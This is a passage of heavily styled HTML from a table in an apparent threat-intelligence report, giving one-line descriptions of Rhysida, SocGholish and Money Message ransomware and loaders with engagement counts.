data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559738&quot;:120,&quot;335559739&quot;:120,&quot;335559740&quot;:276}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td class="LastCol SCXW67619765 BCX4" data-celllook="4369" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 103px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" paraid="363410556" paraeid="{592ff12b-4715-4f58-96e6-7c6139a73691}{195}" style="-webkit-user-drag: none; margin: 8px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">1</span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559738&quot;:120,&quot;335559739&quot;:120,&quot;335559740&quot;:276}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td></tr><tr class="TableRow SCXW67619765 BCX4" role="row" aria-rowindex="47" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; height: 19px;"><td class="FirstCol SCXW67619765 BCX4" data-celllook="4369" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 146px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" paraid="334506055" paraeid="{820a51bf-1c6b-4df4-a77f-0feec15e9971}{44}" style="-webkit-user-drag: none; margin: 19.2px 0px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: bold; font-style: normal; vertical-align: baseline; background-color: transparent; color: rgb(255, 255, 255); text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 15px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-weight: bold; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Header" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">Software</span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;335559738&quot;:288}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 15px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td data-celllook="4369" class="SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 146px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" paraid="1320078833" paraeid="{592ff12b-4715-4f58-96e6-7c6139a73691}{225}" style="-webkit-user-drag: none; margin: 8px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">Rhysida</span><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">&#xA0;</span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559738&quot;:120,&quot;335559739&quot;:120,&quot;335559740&quot;:276}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td data-celllook="4369" class="SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 227px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" paraid="1795332177" paraeid="{592ff12b-4715-4f58-96e6-7c6139a73691}{232}" style="-webkit-user-drag: none; margin: 8px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">A RaaS, known for posing as a cybersecurity team that &#x201C;helps&#x201D; its victims<span class="Apple-converted-space">&#xA0;</span></span><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">identify</span><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;"><span class="Apple-converted-space">&#xA0;</span>security weaknesses in their networks.</span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559738&quot;:120,&quot;335559739&quot;:120,&quot;335559740&quot;:276}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td class="LastCol SCXW67619765 BCX4" data-celllook="4369" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 103px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" paraid="2086935785" paraeid="{592ff12b-4715-4f58-96e6-7c6139a73691}{239}" style="-webkit-user-drag: none; margin: 8px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">Pre-ransomware engagement</span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559738&quot;:120,&quot;335559739&quot;:120,&quot;335559740&quot;:276}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td></tr><tr class="TableRow SCXW67619765 BCX4" role="row" aria-rowindex="48" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; height: 19px;"><td class="FirstCol SCXW67619765 BCX4" data-celllook="4369" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 146px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" xml:lang="EN-US" lang="EN-US" paraid="1086178341" paraeid="{9ac54ef9-9658-45d3-928a-f2f03b27d238}{153}" style="-webkit-user-drag: none; margin: 8px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;"></span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559738&quot;:120,&quot;335559739&quot;:120,&quot;335559740&quot;:276}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td data-celllook="4369" class="SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 146px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" paraid="914954473" paraeid="{592ff12b-4715-4f58-96e6-7c6139a73691}{247}" style="-webkit-user-drag: none; margin: 8px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">SocGholish</span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559738&quot;:120,&quot;335559739&quot;:120,&quot;335559740&quot;:276}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td data-celllook="4369" class="SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 227px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" paraid="40213052" paraeid="{592ff12b-4715-4f58-96e6-7c6139a73691}{254}" style="-webkit-user-drag: none; margin: 8px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">A JavaScript-based loader malware that has been used<span class="Apple-converted-space">&#xA0;</span></span><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">since at least</span><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;"><span class="Apple-converted-space">&#xA0;</span>2017, primarily for<span class="Apple-converted-space">&#xA0;</span></span><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">initial</span><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;"><span class="Apple-converted-space">&#xA0;</span>access.&#xA0;</span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559738&quot;:120,&quot;335559739&quot;:120,&quot;335559740&quot;:276}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td class="LastCol SCXW67619765 BCX4" data-celllook="4369" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 103px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" paraid="2029037609" paraeid="{7555e31a-d083-4f80-9934-16e5e1dfdc9e}{6}" style="-webkit-user-drag: none; margin: 8px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">1</span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559738&quot;:120,&quot;335559739&quot;:120,&quot;335559740&quot;:276}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td></tr><tr class="TableRow SCXW67619765 BCX4" role="row" aria-rowindex="49" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; height: 19px;"><td class="FirstCol LastRow SCXW67619765 BCX4" data-celllook="4369" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 146px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" xml:lang="EN-US" lang="EN-US" paraid="1246043199" paraeid="{9ac54ef9-9658-45d3-928a-f2f03b27d238}{157}" style="-webkit-user-drag: none; margin: 8px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;"></span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559738&quot;:120,&quot;335559739&quot;:120,&quot;335559740&quot;:276}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td class="LastRow SCXW67619765 BCX4" data-celllook="4369" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 146px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" paraid="686025187" paraeid="{7555e31a-d083-4f80-9934-16e5e1dfdc9e}{14}" style="-webkit-user-drag: none; margin: 8px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">Money Message</span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559738&quot;:120,&quot;335559739&quot;:120,&quot;335559740&quot;:276}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; color: windowtext; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td class="LastRow SCXW67619765 BCX4" data-celllook="4369" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 227px;"><div class="TableCellContent SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 9px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW67619765 BCX4" paraid="141741669" paraeid="{7555e31a-d083-4f80-9934-16e5e1dfdc9e}{21}" style="-webkit-user-drag: none; margin: 8px 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW67619765 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: windowtext; font-size: 10pt; line-height: 17.25px; font-family: CiscoSansTT, CiscoSansTT_EmbeddedFont, CiscoSansTT_MSCustomFont, CiscoSansTT_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">A ransomware that emerged in<span class="Apple-converted-space">&#xA0;</span></span><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">March 2023, and</span><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;"><span class="Apple-converted-space">&#xA0;</span>is capable of targeting Windows and Linux systems (including VMware<span class="Apple-converted-space">&#xA0;</span></span><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">ESXi</span><span class="NormalTextRun SCXW67619765 BCX4" data-ccp-parastyle="Table Body" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">servers).</span></span><span class="EOP SCXW67619765 BCX4" data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559738&quot;:120,&quot;335559739&quot;:120,&quot;335559740&quot;:276}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 